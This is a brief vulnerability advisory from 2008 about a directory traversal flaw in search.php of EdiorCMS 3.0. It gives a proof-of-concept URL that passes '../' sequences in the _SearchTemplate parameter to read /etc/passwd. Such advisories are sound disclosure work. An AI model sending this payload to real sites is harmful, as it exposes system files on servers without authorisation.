EdiorCMS version 3.0 suffers from a directory traversal vulnerability in search.php.
4452365c6c892e1fd3d92958b54a135b2aaa2ff02b654eb29d10fb57fb90820d
Directory traversal in EdiorCMS V3.0
Application: EdiorCMS V3.0
Vendor: http://www.edior.com
Versions: 3.0
Platforms: ALL
Bug: Directory traversal
Exploitation: remote
Date: 13 Mar 2008
Author: Shennan Wang
e-mail: wsn1983@gmail.com
POC: http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd